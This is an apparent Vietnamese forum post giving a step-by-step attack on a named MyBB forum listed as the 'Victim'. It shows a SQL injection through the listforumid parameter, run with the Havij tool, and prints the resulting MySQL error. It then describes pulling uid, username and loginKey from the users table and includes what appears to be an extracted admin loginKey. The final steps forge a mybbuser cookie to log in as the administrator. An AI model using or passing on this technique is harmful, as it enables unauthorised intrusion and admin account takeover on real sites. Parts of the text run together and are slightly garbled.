Victim : http://mybbvietnam.com/forum
Chuẩn bị:
+ Firefox
+ Addon Cookie Manager
+ Havij
Khai thác:
Dùng havij khai thác các columns uid, username, loginKey trong table users thông qua link :http://mybbvietnam.com/forum/xmlhttp...&listforumid=1 ( thêm dấu ' đăng sau sẽ bị sql inject)
Code:SQL Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') AND fid NOT IN (0) AND visible = 1 ORDER BY lastpost DESC LIMIT 1' at line 4 Query: SELECT a.tid,a.fid,a.subject,a.dateline,a.lastpost,a.replies,a.views,a.lastposter,a.lastposteruid,t.displaystyle FROM vmybb_threads a LEFT JOIN vmybb_threadprefixes t ON (t.pid = a.prefix) WHERE fid IN (1\') AND fid NOT IN (0) AND visible = 1 ORDER BY lastpost DESC LIMIT 1Đăng nhập:
Ví dụ dữ liệu khai thác được có dạng như sau:
Code:1|Admin|YEWIYZK7IUPJmTPzDUSEnVtFV4JztlbtLe1Kletcp7yyDVjMpYChỉnh sửa lại như này
:Code:1_YEWIYZK7IUPJmTPzDUSEnVtFV4JztlbtLe1Kletcp7yyDVjMpYDùng Cookie Manager tạo mới (hoặc sửa) giá trị biến mybbuser thành
, save.
tiền tố : mybbuserF5, vậy là đã đăng nhập thành công vào tài khoản admin